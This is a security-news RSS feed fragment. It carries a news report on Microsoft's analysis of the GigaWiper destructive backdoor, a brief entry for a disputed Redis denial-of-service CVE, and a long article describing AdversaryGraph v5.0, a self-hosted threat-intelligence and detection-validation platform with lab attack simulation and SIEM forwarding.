<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=4-0-3178649-1-0-0-0-0?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<p><strong>Lesetipp: </strong><a href="https://www.pcwelt.de/article/2043389/windows-defender-einrichten-nutzen.html" target="_blank" rel="noreferrer noopener">Windows Defender optimal einrichten und nutzen</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft uncovers GigaWiper, a backdoor designed for destruction on demand]]></title>
<description><![CDATA[Microsoft is warning defenders about a new backdoor that blurs the line between espionage malware and wipers.



In a technical analysis published on Thursday, Microsoft Threat Intelligence detailed GigaWiper, a Golang-based implant first observed in October 2025 intrusions that combines remote a...]]></description>
<link>https://tsecurity.de/de/3659201/it-security-nachrichten/microsoft-uncovers-gigawiper-a-backdoor-designed-for-destruction-on-demand/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659201/it-security-nachrichten/microsoft-uncovers-gigawiper-a-backdoor-designed-for-destruction-on-demand/</guid>
<pubDate>Fri, 10 Jul 2026 11:07:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft is warning defenders about a new backdoor that blurs the line between espionage malware and wipers.</p>



<p>In a technical analysis published on Thursday, Microsoft Threat Intelligence detailed GigaWiper, a Golang-based implant first observed in October 2025 intrusions that combines remote administration capabilities with multiple disk-wiping and ransomware routines.</p>



<p>Rather than building a new destructive tool from scratch, the operators assembled GigaWiper from several existing malware families, embedding them as modular commands inside a single backdoor.</p>



<p>“GigaWiper is particularly notable for its makeup,” Microsoft researchers <a href="https://www.microsoft.com/en-us/security/blog/2026/07/09/gigawiper-anatomy-of-a-destructive-backdoor-assembled-from-multiple-malware/" target="_blank" rel="noreferrer noopener">said</a>. “The consolidation of multiple destructive capabilities into a modular backdoor reflects a notable shift in wiper malware, which are typically designed purely to destroy rather than to extort and carry real-world consequences.”</p>



<p>Malware capabilities of the backdoor included multiple disk wiping logics, an irreversible Crucio ransomware encryption, persistence, and RabbitMQ and Redis-based communication.</p>



<h2 class="wp-block-heading"><a></a>A backdoor for destruction on demand</h2>



<p>According to Microsoft, GigaWiper exists in two forms. A standalone wiper and a larger backdoor whose command set embeds the standalone wiping functionality alongside numerous administrative features.</p>



<p>Written in Go, the malware supports 20 command codes that enable operators to execute <a href="https://www.csoonline.com/article/4006326/how-to-log-and-monitor-powershell-activity-for-suspicious-scripts-and-commands.html">PowerShell </a>commands, manage Windows services and processes, manipulate the registry, capture screenshots, record displays, clear event logs, and remotely control infected systems through a Virtual Network Computing (<a href="https://www.csoonline.com/article/573427/exposed-vnc-threatens-critical-infrastructure-as-attacks-spike.html">VNC</a>)-like capability.</p>



<p>Persistence is established through a scheduled task posing as a “OneDrive Update,” while command-and-control (C2) relies on <a href="https://www.csoonline.com/article/572033/fbis-warning-about-iranian-firm-highlights-common-cyberattack-tactics.html?utm=hybrid_search#:~:text=RabbitMQ%20service%20on%20SolarWinds">RabbitMQ</a> for receiving instructions and <a href="https://www.csoonline.com/article/1308535/new-redis-attack-campaign-weakens-systems-before-deploying-cryptominer.html">Redis </a>for returning command output. This architecture allows attackers to quietly maintain access and selectively activate destructive functionality when an objective has been achieved, the researchers added.</p>



<h2 class="wp-block-heading"><a></a>The backdoor combines three malware families</h2>



<p>Microsoft researchers found that GigaWiper integrates destructive code from multiple malware families instead of relying on a single wiping mechanism.</p>



<p>These integrations show up in the form of separate commands that the backdoor supports.<br><br>One command performs raw physical disk wiping by overwriting drives and removing partition metadata. Another borrows from the Crucio ransomware family, encrypting files with randomly generated keys that are intentionally never stored, making recovery impossible despite presenting itself like ransomware.</p>



<p>A third command recreates the functionality of FlockWiper, implementing secure multi-pass wiping in Go to permanently erase data on Windows systems.</p>



<p>“We tied GigaWiper to both Crucio and FlockWiper based on code analysis, shared execution flow, function naming, and unique strings,” the researchers said. “Crucio’s code was the base for GigaWiper command 3, and FlockWiper was re-coded in Golang and updated for GigaWiper command 12,” they noted, referring to the 20 listed commands the backdoor supports.</p>



<p>The standalone wiper was implemented as command 1 from the list.</p>



<p>Microsoft recommended hardening endpoints and identities, enabling behavioral detection and endpoint detection and response (EDR) capabilities, and using attack surface reduction controls to limit compromise risks. </p>



<p>The company also urged defenders to maintain offline or otherwise resilient backups, as destructive malware like GigaWiper is designed to irreversibly wipe or encrypt data. To support detection, the researchers shared a list of indicators of compromise (IOCs), which included FlockWiper and Crucio file hashes and a couple of C2 IP addresses.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2020-21468 | Redis 5.0.7 redis-server denial of service (Issue 6633)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Redis 5.0.7. This affects an unknown part of the component redis-server. Performing a manipulation results in denial of service.

This vulnerability is known as CVE-2020-21468. Access to the local network is required for this attack. No e...]]></description>
<link>https://tsecurity.de/de/3647281/sicherheitsluecken/cve-2020-21468-redis-507-redis-server-denial-of-service-issue-6633/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647281/sicherheitsluecken/cve-2020-21468-redis-507-redis-server-denial-of-service-issue-6633/</guid>
<pubDate>Sun, 05 Jul 2026 22:53:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/redis">Redis 5.0.7</a>. This affects an unknown part of the component <em>redis-server</em>. Performing a manipulation results in denial of service.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2020-21468">CVE-2020-21468</a>. Access to the local network is required for this attack. No exploit is available.

There are still doubts about whether this vulnerability truly exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[AdversaryGraph v5.0: From CTI Mapping to Attack Simulation and SIEM Validation]]></title>
<description><![CDATA[A self-hosted CTI-to-detection workbench for ATT&CK mapping, IOC investigation, malware analysis, asset attack-surface mapping, attack simulation, and detection engineering validation.IntroductionAdversaryGraph started as a practical question:How can a security team move from threat intelligence ...]]></description>
<link>https://tsecurity.de/de/3646308/hacking/adversarygraph-v50-from-cti-mapping-to-attack-simulation-and-siem-validation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646308/hacking/adversarygraph-v50-from-cti-mapping-to-attack-simulation-and-siem-validation/</guid>
<pubDate>Sun, 05 Jul 2026 08:22:34 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><em>A self-hosted CTI-to-detection workbench for ATT&amp;CK mapping, IOC investigation, malware analysis, asset attack-surface mapping, attack simulation, and detection engineering validation.</em></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pE4s-eX1wFWMUOsnozr16w.png"></figure><h3>Introduction</h3><p>AdversaryGraph started as a practical question:</p><p><strong>How can a security team move from threat intelligence to detection engineering without losing the evidence trail?</strong></p><p>Most CTI workflows produce useful text, but the next steps are often manual. An analyst reads a report, extracts behaviors, maps them to MITRE ATT&amp;CK, compares them with known actors, enriches IOCs, writes detection ideas, and then asks a detection engineer to validate whether telemetry actually exists in the SIEM.</p><p>That gap is where a lot of defensive work slows down.</p><p>AdversaryGraph v5.0 is my attempt to make that workflow more operational. It is not only a CTI visualization project. It is a self-hosted analyst workbench that connects:</p><ul><li><strong>Report and telemetry analysis.</strong></li><li><strong>ATT&amp;CK technique mapping.</strong></li><li><strong>Group, campaign, and report similarity.</strong></li><li><strong>IOC enrichment and investigation.</strong></li><li><strong>Malware analysis workflows.</strong></li><li><strong>Asset attack-surface mapping.</strong></li><li><strong>Attack simulation.</strong></li><li><strong>SIEM forwarding and validation.</strong></li><li><strong>Analyst-ready documentation and reports.</strong></li></ul><p>The main addition in release 5.0 is <strong>Attack Simulation</strong>: a controlled ATT&amp;CK validation workspace where an analyst can select a technique, run approved lab scenarios, inspect target-side telemetry, forward logs to a SIEM collector, and use an AI assistant to generate coherent multi-phase attack-chain drills.</p><p>This article explains what is new in v5.0, how the architecture works, what the platform can do today, and how I expect analysts and detection engineers to use it.</p><p>Project links:</p><ul><li>Project landing page: <a href="https://1200km.com/adversarygraph/">https://1200km.com/adversarygraph/</a></li><li>Documentation: <a href="https://1200km.com/adversarygraph-docs/">https://1200km.com/adversarygraph-docs/</a></li><li>GitHub: <a href="https://github.com/anpa1200/adversarygraph">https://github.com/anpa1200/adversarygraph</a></li><li>Release v5.0.0: <a href="https://github.com/anpa1200/adversarygraph/releases/tag/v5.0.0">https://github.com/anpa1200/adversarygraph/releases/tag/v5.0.0</a></li></ul><h3>Table of Contents</h3><ul><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#e399"><strong>Getting Started</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#cea9"><strong>The Problem: CTI Often Stops Before Validation</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#dfa8"><strong>What AdversaryGraph Is</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#cb81"><strong>Core Capabilities Before v5.0</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#873f"><strong>What Is New in v5.0</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#bca9"><strong>TTP-First Simulation Workflow</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#b2a4"><strong>Real Lab Telemetry for Web Scenarios</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#251c"><strong>SIEM Forwarding</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#a5cc"><strong>AI Attack Assistant</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#3d3e"><strong>Coherent Kill Chains, Not Random Events</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#2f06"><strong>Explain Attack</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#f317"><strong>Named Scenario Library</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#144f"><strong>Safety Boundaries</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#cd7c"><strong>How This Fits Detection Engineering</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#e7d0"><strong>Architecture Overview</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#6252"><strong>Example Use Case: Password Spray Detection</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#231b"><strong>Example Use Case: Web Recon to Exploit-Shaped Telemetry</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#8a5c"><strong>Example Use Case: Malware Findings to Detection Validation</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#dbfb"><strong>Example Use Case: Asset Inventory to Attack Surface</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#8e80"><strong>What This Release Is Not</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#ff3a"><strong>What Makes v5.0 Different</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#e399"><strong>Getting Started</strong></a></li><li><a href="https://infosecwriteups.com/adversarygraph-v5-0-from-cti-mapping-to-attack-simulation-and-siem-validation-21873b2a6c39#22f6"><strong>Final Thoughts</strong></a></li></ul><h3>The Problem: CTI Often Stops Before Validation</h3><p>A typical CTI-to-detection workflow looks like this:</p><ol><li>Read an external report, internal incident report, malware note, or intelligence summary.</li><li>Extract behaviors: PowerShell, scheduled tasks, credential dumping, public-facing application exploitation, exfiltration, persistence, discovery, and so on.</li><li>Map those behaviors to MITRE ATT&amp;CK.</li><li>Compare them with known actor and campaign profiles.</li><li>Identify relevant IOCs.</li><li>Write hunting hypotheses and detection logic.</li><li>Ask whether the SIEM actually receives the required telemetry.</li><li>Test rules with sample logs, lab traffic, or purple-team activity.</li></ol><p>The hard part is not just mapping. The hard part is preserving the chain from <strong>evidence</strong> to <strong>technique</strong> to <strong>telemetry</strong> to <strong>detection validation</strong>.</p><p>If the SIEM parser is broken, the detection will not fire.</p><p>If the event structure is wrong, the rule will not match.</p><p>If the test event is too synthetic, the validation result is misleading.</p><p>If the ATT&amp;CK mapping is not tied back to evidence, the report becomes hard to defend.</p><p>AdversaryGraph v5.0 focuses on this full chain.</p><h3>What AdversaryGraph Is</h3><p>AdversaryGraph is a self-hosted CTI-to-detection platform. It combines a public research interface with a Docker-based private platform.</p><p>The public site is useful for exploration: ATT&amp;CK matrix navigation, group research, public technique context, and project documentation.</p><p>The self-hosted platform is where private work belongs: AI-assisted report analysis, stored investigations, IOC enrichment, malware-analysis workflows, asset inventories, attack simulation, SIEM validation, and API-driven workflows.</p><p>The high-level workflow is:</p><ol><li><strong>Ingest</strong> reports, logs, IOCs, malware findings, asset inventory, or feed data.</li><li><strong>Map</strong> behaviors to ATT&amp;CK with evidence and confidence.</li><li><strong>Enrich</strong> IOCs, actors, campaigns, malware families, and references.</li><li><strong>Validate</strong> coverage using lab telemetry and SIEM forwarding.</li><li><strong>Report</strong> findings in analyst-ready form.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*sMubTyaMt5F9zU2t.png"></figure><h3>Core Capabilities Before v5.0</h3><p>Release 5.0 builds on a broader platform. The major existing modules are still part of the release and matter because Attack Simulation is designed to connect to them.</p><p><strong>All capabilities here:</strong></p><p><a href="https://1200km.com/adversarygraph-docs/capabilities/">Platform Capabilities | AdversaryGraph Documentation - CTI-to-Detection Workbench | 1200km</a></p><h4>AI-Assisted ATT&amp;CK Mapping</h4><p>Analysts can paste text or upload reports and ask the configured LLM provider to extract ATT&amp;CK candidates. The platform supports multiple provider options, including Claude, OpenAI, Gemini, MiniMax, and local OpenAI-compatible gateways.</p><p>The important part is not simply “ask AI for TTPs.” The useful part is that mappings are treated as analyst-assistance data:</p><ul><li>Techniques are shown with evidence.</li><li>Confidence is visible.</li><li>Output can be reviewed before operational use.</li><li>Extracted TTPs can be pushed into the Navigator.</li><li>Results can be compared with groups, campaigns, and stored reports.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*YMWb4u7m0Ogpsb6T.png"></figure><h4>ATT&amp;CK Navigator and Group Context</h4><p>The Navigator is the central workspace for technique review. It supports Enterprise, Mobile, ICS, and ATLAS-style workflows. Analysts can search techniques, build layers, overlay group context, import/export layers, and move selected TTPs into comparison and reporting workflows.</p><p>This matters because many teams already think in ATT&amp;CK, but their toolchain is split between reports, spreadsheets, diagrams, SIEM rules, and ticketing systems. AdversaryGraph tries to keep the matrix connected to the rest of the investigation.</p><h4>Group, Campaign, and Report Similarity</h4><p>AdversaryGraph uses TTP overlap as a way to generate hypotheses. It compares selected behavior against ingested group profiles, campaigns, and stored report libraries.</p><p>This is intentionally framed as similarity, not attribution.</p><p>TTP overlap can help prioritize research. It can suggest which actor profiles or campaigns deserve review. It is not proof that a specific actor is responsible for an intrusion.</p><h4>IOC Investigation</h4><p>The IOC workflow lets analysts pivot from observable data into reputation and relationship context. IPs, domains, URLs, hashes, and other observables can be investigated with feed context and ATT&amp;CK leads.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*SHhDv7Qw2exVtviQ.png"></figure><h4>Malware Analysis</h4><p>The Malware Analysis module connects static triage, hash checks, unpacking, strings, decompilation/debug views, runtime-gated analysis, and AI summaries back to the CTI workflow.</p><p>The point is not to replace a reverse engineer. The point is to help analysts preserve malware-derived evidence and map it into ATT&amp;CK, IOCs, and investigation outputs.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*W0QBOK9La3Q3mirM.png"></figure><h4>Asset Attack-Surface Mapping</h4><p>AdversaryGraph can ingest asset inventory input, normalize assets, score exposure, propose likely entry points, and map asset-driven ATT&amp;CK candidates.</p><p>This is useful when the question is not “what did the attacker do?” but “what could an attacker realistically try against my exposed environment?”</p><p>Examples:</p><ul><li>Public web applications.</li><li>VPN and identity services.</li><li>Exposed admin panels.</li><li>Cloud assets.</li><li>Remote management services.</li><li>High-value internal systems.</li><li>Scanner and CMDB exports.</li></ul><h3>What Is New in v5.0</h3><p>The headline feature is <strong>Attack Simulation</strong>.</p><p>Attack Simulation is designed for defensive validation and detection engineering. It lets analysts work from a TTP-first interface, run safe simulations, inspect telemetry, and forward events to a SIEM.</p><p>This is not an exploitation framework. It does not run malware. It does not execute arbitrary commands against arbitrary user targets. It is a controlled validation workspace for authorized lab scenarios and source-shaped telemetry drills.</p><p>The v5.0 release adds:</p><ul><li>A new Attack Simulation workspace.</li><li>ATT&amp;CK-style matrix selection for runnable simulations.</li><li>Dedicated configuration pages per selected TTP.</li><li>Built-in lab web target for web-focused scenarios.</li><li>Target-side real-time log viewing.</li><li>SIEM forwarding to HTTP(S) collectors.</li><li>Saved recent SIEM destinations.</li><li>AI Attack Assistant.</li><li>“Challenge Me” mode.</li><li>Complicated multi-source attack-chain scenarios.</li><li>25 named coherent scenario templates.</li><li>Attack-chain graph.</li><li>Explain Attack panel.</li><li>Source-shaped Windows, Sysmon, EDR, DNS, proxy, firewall, web, and WAF event generation for SIEM parser and rule validation.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*6nP-gwkSId3d917_.png"></figure><h3>TTP-First Simulation Workflow</h3><p>The workflow starts with the ATT&amp;CK matrix.</p><p>Runnable simulation cells are visible directly in the matrix, and related TTP pages can link back into the simulation workflow. This keeps the analyst oriented around ATT&amp;CK instead of hiding simulations behind unrelated forms.</p><p>The basic flow is:</p><ol><li>Open Attack Simulation.</li><li>Choose a TTP from the matrix.</li><li>Open the dedicated simulation page.</li><li>Review what the scenario does.</li><li>Review telemetry source and event structure.</li><li>Run the lab scenario or AI-assisted telemetry drill.</li><li>Inspect logs in real time.</li><li>Forward selected logs to the SIEM.</li><li>Confirm whether detections fired.</li><li>Record validation gaps.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*1RZJyK6gkRejmuv0.png"></figure><p>Each scenario explains:</p><ul><li>What happens.</li><li>What adversary behavior is represented.</li><li>Which system emits telemetry.</li><li>Which event structures are expected.</li><li>What the detection should focus on.</li><li>Which telemetry is production-like and which is a lab canary.</li><li>What the validation gaps are.</li></ul><p>That explanation is important. A simulation without context is just noise. A simulation with context becomes a detection-engineering exercise.</p><h3>Real Lab Telemetry for Web Scenarios</h3><p>One major design goal was to avoid fake “log generation” for web scenarios where a real lab target can safely produce logs.</p><p>For web-focused simulations, the Docker deployment includes an attack-lab-web target. The AdversaryGraph API sends real HTTP requests to that lab web server over the Docker network. The target server writes its own logs.</p><p>The analyst can then inspect real target-side telemetry such as:</p><ul><li>NGINX access logs.</li><li>NGINX error logs.</li><li>Application authentication logs.</li><li>WAF/security-style logs.</li><li>Structured web JSONL telemetry.</li><li>Run-specific JSONL logs.</li><li>Merged attacked-server events.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/988/0*CPDdyF-3kyqCleFB.png"></figure><p>This is different from simply printing a row that looks like an access log. The request is sent to the lab server, and the server emits the log.</p><p>Supported web-focused scenarios include:</p><ul><li>HTTP and TLS service fingerprinting.</li><li>Public application probing.</li><li>Path discovery.</li><li>Sensitive file and configuration path access.</li><li>Directory traversal canaries.</li><li>SQL injection-shaped requests.</li><li>XSS-shaped requests.</li><li>SSRF-shaped requests.</li><li>Command-injection-shaped requests.</li><li>Web-shell access canaries.</li><li>Upload and download scenarios.</li><li>Failed-login flows.</li><li>Brute-force patterns.</li><li>Password spray.</li><li>User enumeration.</li><li>Beacon-like web traffic.</li><li>Exfiltration-shaped traffic.</li></ul><p>The key phrase is “attack-shaped canary.” The goal is to generate realistic defensive telemetry without exploiting a real target or executing harmful payloads.</p><h3>SIEM Forwarding</h3><p>Validation is incomplete if the event never reaches the SIEM.</p><p>The v5.0 SIEM forwarding panel sends selected Attack Simulation telemetry to HTTP(S) collectors. This can be used with Logstash HTTP input, Splunk HEC-style collectors, XpoLog/Logeye listeners, or custom webhook receivers.</p><p>Supported controls include:</p><ul><li>Full URL or raw host:port/path destination.</li><li>Direct destination mode.</li><li>Docker host gateway routing.</li><li>Automatic route selection.</li><li>Raw original line per request.</li><li>JSON event per request.</li><li>JSON Lines.</li><li>Batch envelope.</li><li>No auth.</li><li>Bearer token auth.</li><li>Token auth.</li><li>Basic auth.</li><li>Custom token header.</li><li>Source selection: access, auth, endpoint, WAF/security, error, structured JSONL, run JSONL, or all attacked-server events.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/988/0*DYOx-cPX4OK1g66v.png"></figure><p>The platform also keeps the last 10 non-secret SIEM destinations for reuse. This is useful during repeated parser testing, rule tuning, and dashboard validation.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/988/0*vpv4bXcWuUgvV4Hx.png"></figure><p>Credentials are not stored as part of the saved destination history. The saved address is intended to reduce typing friction, not to become a secret store.</p><h3>AI Attack Assistant</h3><p>The AI Attack Assistant is one of the main additions in v5.0.</p><p>It helps generate detection-engineering drills by building correlated telemetry stories around selected behavior.</p><p>The assistant supports three modes:</p><ol><li><strong>Selected TTP</strong>: generate a focused validation flow around the technique currently selected in the Attack Simulation page.</li><li><strong>Threat actor</strong>: generate a scenario inspired by a threat actor’s known behavior and ATT&amp;CK profile.</li><li><strong>Challenge Me</strong>: generate a blind multi-phase detection challenge for the analyst.</li></ol><p>There is also a <strong>Complicated attack</strong> option. When enabled, the assistant builds longer multi-source flows across telemetry types such as:</p><ul><li>Windows Security Event Log.</li><li>Sysmon.</li><li>EDR process and file telemetry.</li><li>DNS logs.</li><li>Proxy logs.</li><li>Firewall traffic logs.</li><li>Web access logs.</li><li>WAF/security logs.</li><li>Authentication logs.</li></ul><p>The goal is not to normalize everything into one generic schema. For complicated scenarios, the assistant should preserve source/vendor-shaped event patterns so the SIEM parser and rule logic are tested more realistically.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*R2jz_jH_4T-N9__R.png"></figure><h3>Coherent Kill Chains, Not Random Events</h3><p>A detection drill should not be a random list of suspicious events.</p><p>In v5.0, complicated scenarios are built as coherent attack chains. The chain has ordered phases, each phase has a reason, and each phase emits events that should correlate with the surrounding activity.</p><p>For example, a password-spray-to-foothold scenario may include:</p><ol><li>Username enumeration.</li><li>Multiple failed authentication attempts.</li><li>One successful logon after failures.</li><li>Endpoint discovery from the authenticated host.</li><li>Suspicious tool transfer.</li><li>Persistence or lateral discovery.</li></ol><p>That is much more useful than a single failed-login event.</p><p>The Attack Chain Graph makes this visible.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*-bkB_LbIx9r5Ro35.png"></figure><p>Each phase can show:</p><ul><li>Phase number.</li><li>ATT&amp;CK technique.</li><li>Telemetry source.</li><li>Event format.</li><li>Event count.</li><li>Detection goal.</li><li>Supporting tags.</li></ul><p>This helps the analyst understand whether the generated activity is a plausible kill chain or just a bag of indicators.</p><h3>Explain Attack</h3><p>When “Challenge Me” or a complex AI-generated scenario is used, the platform includes an <strong>Explain Attack</strong> action.</p><p>This panel explains:</p><ul><li>What the scenario is trying to simulate.</li><li>Why each phase appears in the chain.</li><li>Which telemetry sources matter.</li><li>What the analyst should search for.</li><li>What detections should fire.</li><li>Which false positives or tuning points should be considered.</li><li>What success criteria should be used.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*H7lfS2NaR1B5hvEV.png"></figure><p>This is useful for training and validation. It turns generated events into an exercise that a SOC analyst, detection engineer, or CTI analyst can actually follow.</p><h3>Named Scenario Library</h3><p>Release 5.0 includes a library of named coherent scenarios.</p><p>Examples include:</p><ul><li>Web App to Endpoint Compromise.</li><li>Password Spray to Valid Account Foothold.</li><li>SQL Injection to Data Theft.</li><li>Recon to Web Shell Persistence.</li><li>Valid Account to LSASS Access.</li><li>Password Spray to Exfiltration.</li><li>XSS Canary to Session Abuse.</li><li>SSRF Metadata Probe to C2.</li><li>Ransomware Precursor Chain.</li><li>Living-off-the-Land Transfer and Execution.</li><li>Internal Discovery After Foothold.</li><li>Web Enumeration to Password Spray.</li><li>Public App Exploit to Persistence.</li><li>Credential Dump to Cloud Upload.</li><li>Signed Binary Proxy to C2.</li><li>FIN7-style web, identity, and persistence flow.</li><li>APT29-style identity and PowerShell flow.</li><li>Lazarus-style delivery and exfiltration flow.</li><li>Noisy red-team drill.</li><li>Stealthy low-volume intrusion chain.</li><li>WAF bypass retry chain.</li><li>Service account abuse.</li><li>External recon to credential access.</li><li>C2 telemetry validation.</li><li>Persistence control validation.</li></ul><p>These are not meant to prove that a real actor attacked you. They are templates for detection validation and training. They help answer questions like:</p><ul><li>Does my SIEM parse this source?</li><li>Does my correlation rule see the sequence?</li><li>Does the detection alert only on one event or on the chain?</li><li>Can analysts reconstruct the story from logs?</li><li>Which telemetry source is missing?</li><li>Where do false positives appear?</li></ul><h3>Safety Boundaries</h3><p>Attack Simulation must be safe by design.</p><p>The v5.0 module follows several boundaries:</p><ul><li>It does not execute malware.</li><li>It does not run arbitrary commands.</li><li>It does not exploit arbitrary external targets.</li><li>Web simulation traffic is limited to predefined benign canaries against the local lab target.</li><li>SIEM forwarding sends generated Attack Simulation telemetry.</li><li>Unsafe URL schemes and metadata/link-local destinations are blocked.</li><li>Credentials used for forwarding are used only for the current request and are not stored.</li></ul><p>This matters because the target user is a defender. The feature is built for detection engineering, parser validation, SOC drills, and authorized lab workflows.</p><h3>How This Fits Detection Engineering</h3><p>Detection engineering is not only writing rules. It is a lifecycle:</p><ol><li>Understand the adversary behavior.</li><li>Map it to ATT&amp;CK or another behavior model.</li><li>Identify required telemetry.</li><li>Confirm that telemetry exists.</li><li>Confirm that parsing works.</li><li>Write detection logic.</li><li>Test the logic with realistic events.</li><li>Tune false positives.</li><li>Document assumptions and gaps.</li><li>Re-test when infrastructure or parsers change.</li></ol><p>AdversaryGraph v5.0 tries to support this lifecycle directly.</p><p>The CTI modules help with steps 1 and 2.</p><p>IOC and malware modules help enrich the investigation context.</p><p>Asset attack-surface mapping helps identify relevant entry points.</p><p>Attack Simulation helps with steps 3 through 8.</p><p>Reports and docs help with steps 9 and 10.</p><h3>Architecture Overview</h3><p>The self-hosted platform is built around a browser frontend and API backend.</p><p>At a high level:</p><ul><li>Frontend: React/Vite user interface.</li><li>Backend: FastAPI service.</li><li>Database: PostgreSQL for stored investigations and platform data.</li><li>Background jobs: Redis/Celery where needed.</li><li>ATT&amp;CK data: synchronized from MITRE sources.</li><li>AI providers: operator-configured providers such as Claude, OpenAI, Gemini, MiniMax, or local OpenAI-compatible services.</li><li>Malware workflow: MalwareGraph-backed analysis components.</li><li>Attack lab: Docker-based target services for controlled telemetry generation.</li><li>SIEM forwarding: HTTP(S) delivery to configured collectors.</li></ul><p>For the v5.0 web simulation flow, the important architectural distinction is:</p><p>AdversaryGraph does not simply invent an access log line for the UI. It sends real HTTP requests to the lab web target, and the lab web target emits server-side logs.</p><p>For AI-generated complicated scenarios, the goal is different. The assistant generates source-shaped telemetry for SIEM parser and detection validation. This is not proof of compromise, and it is not a replacement for live lab execution. It is a defensive validation tool for testing ingestion, parsers, correlation, dashboards, and analyst workflows.</p><h3>Example Use Case: Password Spray Detection</h3><p>A common detection engineering task is password spray validation.</p><p>The analyst wants to know:</p><ul><li>Do we ingest authentication failures?</li><li>Are usernames parsed correctly?</li><li>Can we count failures across many users?</li><li>Can we detect one source trying one password against many accounts?</li><li>Can we correlate a later successful login?</li><li>Can we connect the successful login to endpoint activity?</li></ul><p>With AdversaryGraph 